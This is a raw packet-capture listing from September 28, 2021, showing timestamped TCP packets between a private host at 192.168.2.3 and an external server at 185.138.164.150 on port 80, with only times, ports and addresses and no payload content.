Sep 28, 2021 08:53:35.176546097 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.176573992 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.176584959 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176620007 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176645041 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.176656961 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176695108 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176719904 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.176738977 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176774025 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176798105 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.176814079 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176852942 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176875114 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.176892042 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176928997 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.176950932 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.176965952 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177002907 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177026033 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177042961 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177079916 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177100897 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177114964 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177172899 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177215099 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177279949 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177319050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177342892 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177357912 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177390099 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177412987 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177428007 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177463055 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177484989 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177499056 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177534103 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177560091 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177572012 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177612066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177632093 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177649021 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177685022 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177706957 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177725077 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177761078 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177781105 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.177794933 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177828074 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.177850008 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.178291082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.185655117 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.185698986 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.185729027 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.185751915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.185772896 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.185792923 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.185807943 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.185859919 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.186120987 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.189069986 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.189102888 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.189125061 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.189146996 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.189169884 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.189191103 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.189423084 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.189482927 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.189486980 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.190037966 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.190064907 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.190171957 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.191354036 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.191384077 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.191406965 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.191428900 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.191451073 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.191468954 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.191490889 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.191539049 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.191557884 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.191561937 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.193654060 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193686962 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193717003 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193742037 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193766117 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193790913 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193813086 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193835020 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193855047 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193875074 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193897963 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193916082 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193937063 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.193962097 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.193965912 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.193965912 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.193969011 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.193972111 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.193974018 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.194004059 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.194034100 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.214184046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.214221001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.214236021 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.214257002 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.214457035 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.215476036 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.215512037 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.215533972 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.215555906 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.215579987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.215600967 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.215631962 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.215656996 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.215663910 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.216798067 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.216834068 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.216859102 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.216881037 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.216905117 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.216928005 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.216949940 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.216945887 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.216972113 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.216995001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217026949 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217031956 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217036009 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217092037 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217379093 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217402935 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217426062 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217454910 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217472076 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217508078 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217523098 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217549086 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217561007 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217592001 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217598915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217622995 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217623949 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217644930 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.217674017 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217689037 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.217715979 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225043058 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225085020 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225107908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225132942 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225157976 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225178957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225193024 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225209951 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225223064 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225240946 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225250006 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225264072 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225286961 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225310087 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225333929 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225334883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225341082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225358963 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225382090 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225390911 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225404024 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225414991 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225426912 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225447893 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225470066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225492954 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225501060 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225507975 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225518942 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225534916 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225543022 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225544930 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225564957 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225586891 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225594044 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225605965 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225615978 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225636005 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225657940 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225699902 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225729942 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225744009 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225749016 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225754023 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225769997 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225809097 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225855112 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225879908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225903034 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225929022 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225944996 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.225954056 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.225992918 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.226042986 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.239216089 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239259958 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239280939 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239298105 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239320040 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239341974 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239362955 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239382029 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239598989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239622116 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239631891 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.239645958 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239661932 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.239665031 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.239666939 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.239670992 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.239674091 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.239698887 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.239747047 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.239788055 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244050980 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244088888 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244107008 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244124889 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244148016 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244173050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244189978 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244213104 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244235992 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244257927 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244272947 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244293928 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244307995 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244317055 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244338989 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244342089 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244359016 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244379997 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244401932 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244410038 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244424105 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244434118 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244438887 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244460106 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244461060 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244483948 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244508982 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244524956 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244544029 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244555950 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244570017 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244579077 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244592905 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244607925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244612932 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244632006 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244632006 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244657040 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244683027 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244699001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244716883 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244716883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244739056 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244750023 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244759083 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244770050 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244772911 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.244787931 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244803905 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244879007 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244901896 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244924068 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.244935989 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.245129108 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.245155096 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.245174885 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.245189905 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.245212078 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.245234966 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.245240927 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.245259047 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.245275974 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.245305061 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.245335102 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.245393038 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.245414972 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.247565031 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.247639894 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.247675896 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.247692108 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.247701883 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.247796059 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.247819901 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.247966051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.248034000 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.248059988 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.248089075 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.248106003 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.248136997 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.248203993 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.248228073 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.249789000 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.249825001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.249849081 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.249869108 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.249892950 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.249908924 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.249913931 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.249933004 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.249973059 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.250032902 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.250052929 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.250207901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250232935 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250255108 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250268936 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250298977 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.250365019 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.250387907 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.250804901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250837088 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250860929 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250883102 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250901937 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.250905037 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250926971 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250946045 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:35.250968933 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.251038074 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.251065969 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:35.252331018 CEST	80	49744	185.138.164.150	192.168.2.3
